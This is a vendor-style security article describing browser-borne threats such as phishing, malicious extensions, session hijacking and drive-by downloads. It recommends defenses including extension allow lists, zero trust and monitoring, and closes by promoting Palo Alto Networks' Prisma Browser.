The Browser Defense Playbook: Stopping the Attacks That Start on Your Screen
The Browser: The New Center of Work — and Risk
The predominance of cloud-based apps and the trend towards remote work have made the browser the place where most work happens. In fact, about 85% of daily work takes place there. This shift has brought numerous benefits, such as increased flexibility and the ability to work from a wider range of locations and devices, accessing full "desktops" inside a browser tab. Organizations can manage apps and browser access more efficiently, leading to greater central management, lower costs, and better flexibility.
However, this new reality also presents significant security challenges. As work migrates to the browser, so do the threats.
The Threat Landscape
In Unit 42’s 2025 Global Incident Response Report, nearly half of the incidents investigated involved malicious activity launched or facilitated through employees’ browsers. Common tactics include phishing, abuse of URL redirects, and malware downloads, each exploiting the browser session without adequate detection or blocking.
Why Browsers Fail: Common Pitfalls and Security Lapses
Despite the security measures built into popular browsers like Google Chrome, Apple Safari, Mozilla Firefox, and Microsoft Edge, attackers find ways to exploit vulnerabilities. These browsers, from the biggest, most trusted names in tech, are often treated as a defense between the internet and the organization’s infrastructure.
Social Engineering
Fraudulent emails, fake websites, and malicious links are common tools in phishing attacks, which are largely conducted through browsers. These attacks can lead to the installation of malware without the user’s knowledge or interaction.
Browser Extensions
Marketplaces like the Google Web Store offer tens of thousands of extensions. Many of these extensions are not secure, and some are outright malicious. A Stanford University study found that 280 million Google Chrome users installed extensions containing malware over a three-year period.
Users on personal devices face additional risks. Personal devices often lack centralized security policies and monitoring to vet or block suspicious extension installations, making them more vulnerable to malware.
Browser-Specific Tactics
Session hijacking tactics allow malware on the endpoint to steal session tokens from the browser, impersonating the user. Cross-site scripting allows attackers to inject scripts into web-based apps, which can steal user sessions, modify transactions, or show fake login screens.
No Clicking Necessary
The traditional advice to "don’t click anything suspicious" is no longer sufficient. Malicious assets are becoming more authentic, and many don’t even require clicking. Simply visiting a malicious or compromised website can cause malware to be downloaded and installed without the user’s knowledge or interaction.
A Lack of Policy
Many organizations overlook the browser as part of the attack surface, allowing insecure protocols and lacking an inventory of permissible extensions. This oversight can leave them vulnerable to a wide range of threats.
Crucial Steps Every Defender Should Take
To address these challenges, organizations should take several crucial steps:
- Secure Browser Extensions: Use enterprise-grade secure browsers with strict extension allow lists and data loss prevention capabilities.
- Implement Zero Trust: Verify user identity and control access tightly within the browser, applying the principle of least privilege to SaaS and web apps.
- Monitor and Log: Continuously monitor browser sessions for risky behavior and log everything. Perform continuous risk assessment regarding device health, user behavior, and application risk.
Zero Trust: Implementation Strategies
- Authenticate and Validate: Authenticate user access permissions before they open the browser and validate the user’s identity before granting access to any web app.
- Apply Conditional Access: Use step-up MFA for sensitive user actions and tailor access rules according to context, such as device security posture, location, or network.
- Monitor and Block: Continuously monitor extensions and block them if they pose a risk. Assume all web traffic and extensions are risky and only allow vetted, enterprise-approved extensions.
Finalizing Your Playbook: Achieving Superior Browser Security
Palo Alto Networks’ Prisma Browser combines zero trust principles with cloud-delivered security services. It provides real-time traffic inspection without the need for encryption, malware prevention, URL filtering, and data loss prevention across traffic — all without an agent. Working with Prisma Access secures access to internal applications without exposing them to the public internet, ensuring every user and device is continuously authenticated and authorized before granting access.
